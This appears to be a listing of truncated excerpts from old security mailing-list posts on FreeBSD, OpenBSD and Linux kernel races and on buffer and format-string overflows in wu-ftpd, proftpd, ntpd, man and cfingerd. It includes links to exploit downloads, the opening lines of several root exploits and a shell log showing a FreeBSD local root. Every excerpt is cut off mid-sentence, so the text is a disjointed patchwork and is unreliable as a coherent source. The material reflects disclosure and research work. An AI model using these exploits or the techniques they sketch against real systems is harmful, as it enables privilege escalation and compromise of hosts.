FreeBSD 6.4 and below are vulnerable to a race condition between pipeclose() and
knlist_cleardel() resulting in a NULL pointer dereference. The following code
exploits the vulnerability to run code in kernel mode, giving a root shell and
escaping from jail.
http://www.frasunek.com/pipe.txt
The bug was
FreeBSD 7.2 and below (including 6.4) are vulnerable to a race condition in the VFS
and devfs code, resulting in a NULL pointer dereference. In contrast to the pipe race
condition, this vulnerability is actually much harder to exploit.
Due to an uninitialised value in devfs_open(), the following function is called
Przemyslaw Frasunek writes:
FreeBSD <= 6.1 suffers from a classical check/use race condition on SMP
There is yet another kqueue related vulnerability. It affects 6.x, up to
6.4-STABLE. The FreeBSD security team was notified on 29th Aug, but there has been no
response so far, so I won't publish any details
FreeBSD <= 6.1 suffers from a classical check/use race condition on SMP
systems in the kevent() syscall, leading to a kernel mode NULL pointer
dereference. It can be triggered by spawning two threads:
the 1st thread looping on open() and close() syscalls, and the
Tavis Ormandy writes:
Linux NULL pointer dereference due to incorrect proto_ops initializations
Quick and dirty exploit for this one:
http://www.frasunek.com/proto_ops.tgz
User Janusz Niewiadomski wrote:
This bug may be non-exploitable if the size of the buffer is greater than
MAXPATHLEN characters. This may occur for example if wu-ftpd is compiled
with some versions of the Linux kernel where PATH_MAX (and MAXPATHLEN
accordingly) is defined to be exactly 4095
Jonas Eriksson [EMAIL PROTECTED] wrote:
o Fixed a security hole in prompt rewriting found by Global InterSec.
Looks like it won't be easy to exploit.
There are a few possible scenarios: using an unlink() or frontlink()
macro in chunk_alloc() or chunk_free(). In both cases we can control
There is a local root compromise in OpenBSD 3.0-current (and below, before 8 Apr
2002).
Full problem report and exploit below. FreeBSD is not vulnerable.
- Forwarded message from [EMAIL PROTECTED] -
From: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: user/2536: possible root
It still seems to be affected under 3.5beta9 (including this version).
Someone said it's not the problem of an exploitable vulnerability about 8
months ago,
FreeBSD is not affected. The problem was fixed 9 months ago and an advisory was
issued. See:
http://www.frasunek.com/sources/security/rexec/
This workaround is not complete, because it doesn't protect against
exploitation of the bug. For example the attacker can send the shellcode via stdin
to the suid program. Its address can also be determined by removing
the suid bit from the program,
Well, after a bunch of tests I've found only two suids which gave me a
suid shell:
/usr/bin/passwd
/usr/local/bin/ssh1
/usr/bin/su also works for me:
riget:venglin:~ egrep -e execl vvfreebsd.c
if(!execl("/usr/bin/su","su","szymon",0))
riget:venglin:~ ./v
vvfreebsd. Written by Georgi Guninski
This problem has been fixed and the exploit didn't work on the last
FreeBSD 4.3-RELEASE.
The exploit *works* even on 4.3-STABLE, before the correction date (2 Jul 2001):
riget:venglin:~ ./v
vvfreebsd. Written by Georgi Guninski
shall jump to bfbffe72
child=57660
Password:done
# id
uid=0(root)
FreeBSD 4.3 local root, yet Linux and *BSD much better than Windows
This problem was already reported to the FreeBSD Security Officer about two
months ago, but it was totally ignored.
--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: [EMAIL PROTECTED] ** PGP:
On Thu, Jun 14, 2001 at 05:14:46PM +0300, Georgi Guninski wrote:
OpenBSD 2.9, 2.8
I have not tested on other OSes but they may be vulnerable
FreeBSD 4.3-STABLE isn't vulnerable. Looks like it's dropping set[ug]id
privileges before allowing detach.
On Tue, Apr 24, 2001 at 01:09:59PM +0300, Atro Tossavainen wrote:
My colleague reports that NetWare servers running Mercury 1.48 crash
happily.
I've tested it on Mercury 1.48 on Netware 4.10 and it crashed. Mercury 1.48
on Netware 4.11 didn't crash.
On Sat, Apr 21, 2001 at 10:52:15AM +0200, Przemyslaw Frasunek wrote:
All versions of the widely-used POP3 server from the Mercury MTA package for Netware
are vulnerable to a remote buffer overflow that allows the Netware server to be crashed:
Actually, the problem was fixed in Mercury 1.48, but no advisory was issued
On Sat, Apr 14, 2001 at 04:41:43PM -0400, fish stiqz wrote:
If anyone gets this working on other systems, let me know.
This is another version of the globbing exploit, written about a week ago. It
creates only one directory.
#!/usr/bin/perl
On Thu, Apr 05, 2001 at 10:56:45PM -0500, Stephen Clouse wrote:
Having no effect on ntp-4.0.99k compiled from official source on Slackware
7.0. The exploit says /tmp/sh was spawned but it never actually runs (/bin/bash
mode didn't change).
As I said, exploiting this overflow isn't so easy --
/* ntpd remote root exploit / babcia padlina ltd. [EMAIL PROTECTED] */
/*
* The Network Time Protocol Daemon (ntpd) shipped with many systems is vulnerable
* to a remote buffer overflow attack. It occurs when building the response for
* a query with a large readvar argument. In almost all cases, ntpd is
On Wed, Mar 07, 2001 at 04:40:05AM +0100, Nomen Nescio wrote:
this is an exploit for wu-ftpd 2.6.1(1) on linux
propz to segv for giving this to me
This is an old wuftpd 2.6.0 SITE EXEC exploit. 2.6.1 is not vulnerable
to this attack.
strcpy (cmdbuf, "SITE EXEC ");
for (ret = 0; ret =
On Fri, Feb 02, 2001 at 03:04:31PM -0800, Kris Kennaway wrote:
BTW. The old BSD derived ftpd is also used in opieftpd and SSLftpd. Both are
vulnerable to this attack.
In case anyone is wondering how old is old:
The same problem persists in the heimdal / kerberosIV ftpd implementation:
Another example of bad coding in ftp daemons, proftpd-1.2.0rc2 in this case.
main.c:659:
void main_exit(void *pv, void *lv, void *ev, void *dummy)
{
    int pri = (int) pv;
    char *log = (char *) lv;
    int exitcode = (int) ev;
    log_pri(pri, log); /* here */
main_exit() is called by
Hello,
There are two non-exploitable format string bugs in wuftpd 2.6.1.
ftpd.c:6272
if (debug) {
    char *s = calloc(128 + strlen(remoteident), sizeof(char));
    if (s) {
        int i = ntohs(pasv_addr.sin_port);
        sprintf(s, "PASV port %i assigned to %s", i,
buffer0verfl0w security advisory #3
Advisory Name: libncurses buffer overflow
Date: 24/4/00
/* (c) 2000 babcia padlina / buffer0verfl0w security (www.b0f.com) */
/* freebsd mtr-0.41 local root exploit */
#include <stdio.h>
#include <sys/param.h>
#include <sys/stat.h>
#include <string.h>
#define NOP 0x90
#define BUFSIZE 1
#define ADDRS 1200
long getesp(void)
On 02-Mar-2000 Derek Callaway wrote:
I believe this overflow is rather difficult to exploit (although not
impossible) as a result of a setuid(getuid()) before the offending code
It does setuid(), but NOT setgid(). Still vulnerable.
The major problem is how to pass a valid **envp to the stack and
/*
* (c) 2000 babcia padlina / b0f
* (lcamtuf's idea)
*
* redhat 6.1 /usr/bin/man exploit
*/
#include <stdio.h>
#include <sys/param.h>
#include <sys/stat.h>
#include <string.h>
#define NOP 0x90
#define OFS 1800
#define BUFSIZE 4002
#define ADDRS 1000
long
Babcia Padlina Ltd. Security Advisory (BP-9909:00)
Synopsis:
Cfingerd is vulnerable to local buffer overflow attack.
Vulnerable versions:
Cfingerd 1.4.2 and
/*
* babcia padlina ltd. (poland, 17/08/99)
*
* your ultimate proftpd pre0-3 exploiting toolkit
*
* based on:
* - adm-wuftpd by duke
* - kombajn do czereni by Lam3rZ (thx for shellcode!)
*
* thx and greetz.
*/
#include